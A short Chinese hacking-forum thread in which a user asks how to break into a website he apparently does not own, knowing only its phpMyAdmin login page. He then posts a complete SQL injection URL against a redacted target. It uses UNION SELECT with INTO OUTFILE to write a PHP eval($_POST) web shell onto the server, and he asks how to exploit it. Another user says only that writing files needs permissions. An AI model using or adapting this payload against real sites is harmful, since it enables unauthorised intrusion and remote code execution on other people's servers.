sql不能注入的网站如何破解

john_chu

sql不能注入的网站如何破解??
目前只知道 myphpadmin 登录地址  其他一无所知?
啊D工具 不支持sql注入?
需要用到那些工具? 什么操作
大神回复支持下呗 谢谢了

90_

干嘛非要找注入呢？
去技术文章板块多看看

john_chu

90_ 发表于 2015-12-29 13:21
干嘛非要找注入呢？
去技术文章板块多看看

没有找注入哦,  只是不知道如何攻破  ,  同服务器下就一个 网址 也不能旁注

john_chu

https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,%2527%3C?php%20eval%28$_POST[%22c%22]%29;?%3E%2527%20into%20outfile%20%2527E:\web\1.php%2527%23   
这样的漏洞如何利用呢

90_

john_chu 发表于 2015-12-29 15:55
https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7 ...

写入文件需要相关权限